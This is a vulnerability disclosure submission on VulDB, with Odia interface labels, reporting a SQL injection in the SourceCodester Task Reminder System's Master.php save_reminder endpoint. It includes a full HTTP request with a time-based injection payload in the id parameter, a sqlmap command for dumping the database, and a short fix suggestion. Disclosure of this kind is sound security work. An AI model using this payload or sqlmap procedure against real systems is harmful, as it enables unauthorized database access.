ଜମା କରନ୍ତୁ #228616: SourceCodester Task Management System POST sql injection ସୂଚନା

ଶୀର୍ଷକ	SourceCodester Task Management System POST sql injection
ବର୍ଣ୍ଣନା	I find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) This affect the file /php-trs/classes/Master.php?f=save_reminder: POST /php-trs/classes/Master.php?f=save_reminder HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6 Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)# Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=1", and then you can successfully drag the library The vulnerability in the code "UPDATE `reminder_list` set {data} where id = '{id}'" arises from not implementing proper filtering on the controllable parameter id. This lack of filtering makes the code susceptible to SQL injection attacks. To prevent such attacks, it is recommended to use mysqli_real_escape_string() to protect the id parameter against malicious exploitation. By doing so, the code will be more secure and less prone to SQL injection vulnerabilities.
ଉତ୍ସ	⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
ଉପଭୋକ୍ତା	fushuling (UID 45488)
ଦାଖଲ	10/26/2023 07:07 PM (2 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	10/26/2023 08:21 PM (1 hour later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	243645 [SourceCodester Task Reminder System 1.0 Master.php?f=save_reminder ID SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ	20

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Might our Artificial Intelligence support you?

Check our Alexa App!